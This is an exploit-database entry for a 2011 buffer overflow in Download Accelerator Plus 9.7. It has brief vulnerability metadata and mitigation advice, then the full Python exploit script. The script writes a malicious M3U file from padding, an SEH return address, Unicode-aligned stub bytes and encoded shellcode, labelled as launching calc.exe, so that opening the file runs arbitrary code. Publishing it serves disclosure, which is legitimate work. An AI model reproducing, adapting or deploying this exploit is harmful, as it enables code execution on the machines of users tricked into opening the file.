Download Accelarator plus(DAP) 9.7 M3U File Buffer Overflow Exploit(UNICODE-SEH)

vendor:

Download Accelerator Plus

by:

C4SS!0 G0M3S

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Download Accelerator Plus

Affected Version From: 9.7

Affected Version To: 9.7

Patch Exists: YES

Related CWE: N/A

CPE: a:speedbit:download_accelerator_plus:9.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 Brazilian Portuguese

2011

Download Accelarator plus(DAP) 9.7 M3U File Buffer Overflow Exploit(UNICODE-SEH)

A buffer overflow vulnerability exists in Download Accelarator Plus (DAP) 9.7. An attacker can exploit this vulnerability by creating a malicious M3U file and convincing the user to open it. This will cause a buffer overflow and allow the attacker to execute arbitrary code on the target system.

Mitigation:

Users should avoid opening files from untrusted sources. Additionally, users should update to the latest version of Download Accelarator Plus (DAP) to mitigate this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python
#
#[+]Exploit Title: Download Accelarator plus(DAP) 9.7 M3U File Buffer Overflow Exploit(UNICODE-SEH)
#[+]Date: 23\07\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.speedbit.com/dap97_baix.exe
#[+]Version: 9.7
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#



import os
import sys
from time import sleep
 
if os.name == "nt":
    os.system("cls")
    os.system("color 4f")
    os.system("Title Download Accelarator plus(DAP) 9.7 M3U File Buffer Overflow Exploit(UNICODE-SEH) ")
else:
    os.system("clear")

print '''
		
		Download Accelarator plus(DAP) 9.7 M3U File Buffer Overflow Exploit(UNICODE-SEH) 
		Created By C4SS!0 G0M3S
		E-mail louredo_@hotmail.com
		Blog net-fuzzer.blogspot.com
		
'''
shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ"
"ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBYKWPNQGYWOCLLVRPHLJ9SDNDKD6QMNP"
"X01D8N853K8KLM3SHQXKD55NP487LQUI92X6VNCJUKC7D6NSMKRVJNZ02MLWORBJMMMPT8U1VMYO1JGV" #Shellcode WinExec "Calc.exe"
"61PL52QHJKVNUKEMD7W3LKKMKKU2KJPMWIMOXKMMROHMKURK8XCL7OK3JXOPLPOMS8S1CG4R7JWIHOKC"
"STNE3MO0W0SQTPQ5QP3HMZUWVKEWQ3N5HZU5ZJQM5VHO6UIOMOKY0J9KN0Q31X6LNNO3ULYTGX7RXNOQ"
"ITPCK8WM5COJH3KXJA")
buf = ("\x41" * 14277)
buf += ("\x41\x41")
buf += ("\x79\x42") #0x00420079 : pop ebx # pop ecx # ret
buf += ("\x55\x61\x55\x61\x55\x61\x55\x56\x55\x58\xc0\x55\x50\x55\xc3")
buf += ("\x41" * 33)
buf += shellcode

print "\t\t[+]Creating File Exploit.m3u..."
sleep(1)
try:
    f = open("Exploit.m3u","wb")
    f.write("http://"+buf)
    f.close()
    print "\t\t[+]File Exploit.m3u Created."
    sleep(2)
except:
    print "\t\t[-]Error in Create file Exploit.m3u"
    sleep(1)